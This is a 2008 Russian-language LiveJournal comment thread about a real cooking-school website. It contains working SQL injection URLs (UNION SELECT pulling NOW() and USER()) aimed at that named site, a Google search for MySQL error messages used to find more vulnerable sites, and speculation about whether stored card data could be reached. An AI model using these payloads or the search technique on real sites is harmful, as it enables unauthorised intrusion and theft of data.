dil: (Default)
dil ([personal profile] dil) wrote2008-08-30 10:16 am
  • Add Memory
  • Share This Entry
Entry tags:
Flat | Top-Level Comments Only

[identity profile] gornal.livejournal.com 2008-08-30 09:28 am (UTC)(link)
И?
http://www.google.ru/search?hl=ru&q=%22You+have+an+error+in+your+SQL+syntax%3B+check+the+manual+that+corresponds+to+your+MySQL+server+version%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=

[identity profile] nikulina.livejournal.com 2008-08-30 10:19 am (UTC)(link)
а вот, например - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,NOW(),null,null,null,null,null,null
или вот - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,USER(),null,null,null,null,null,null

это не просто SQL Injection, это "заходи, кто хочешь, бери, что хочешь" :)

[identity profile] gornal.livejournal.com 2008-08-30 10:25 am (UTC)(link)
И?
Если подумать и чуть-чуть подправить мою ссылку - можно получить ещё десяток тысяч таких сайтов. Это какая-то новость для кого-то? Если cooksacademy для Вас чем-то особенный сайт - написали бы его владельцам, чтобы они поправили. Если просто ещё один из - я не понимаю восторга.

[identity profile] dkfl.livejournal.com 2008-08-30 11:59 am (UTC)(link)
ну и что это тебе дало? набор рецептов? телефонный справочник?

[identity profile] dil.livejournal.com 2008-08-30 12:06 pm (UTC)(link)
А теперь посмотри вниз страницы. Realex Secure Payment System. Visa, MC, AmEx. Как ты думаешь, где они хранят данные от онлайновых заказов?

[identity profile] dkfl.livejournal.com 2008-08-30 12:08 pm (UTC)(link)
я это сразу посмотрел - платежи принимает отдельная система.
так что ценность от этого injection не больше чем от найденного на дороге каталога.

[identity profile] dil.livejournal.com 2008-08-30 12:16 pm (UTC)(link)
да даже если и отдельна система - это ж не повод _так_ писать программы, правда? :)
Flat | Top-Level Comments Only